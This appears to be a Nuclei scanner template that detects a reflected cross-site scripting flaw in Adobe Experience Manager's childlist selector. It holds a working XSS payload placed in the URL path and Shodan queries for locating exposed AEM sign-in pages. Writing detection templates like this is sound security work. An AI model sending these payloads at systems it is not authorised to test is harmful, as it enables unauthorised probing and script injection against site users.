id: aem-xss-childlist

info:
  name: Adobe Experience Manager Childlist Selector - Cross-Site Scripting
  author: theabhinavgaur
  severity: medium
  description: |
    Adobe Experience Manager contains a cross-site scripting vulnerability in requests that use the childlist selector when a dispatcher does not respect the content type returned by AEM and flips it from application/json to text/html. As a consequence, the reflected suffix is interpreted and executed in the browser.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 2
    verified: true
    shodan-query:
      - http.title:"AEM Sign In"
      - http.component:"Adobe Experience Manager"
  tags: xss,aem,adobe,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{rand_base(4)}}<img src=x data'a'onerror=alert(domain)>.childrenlist.html"
      - "{{BaseURL}}/{{rand_base(4)}}<br><br>please%20authenticate<br><br>.childrenlist.html"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src="x" data onerror="alert(domain)"/>'
          - '<br /><br />please authenticate<br /><br />'
        condition: or

      - type: word
        part: body
        words:
          - 'data-coral-columnview-id'

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200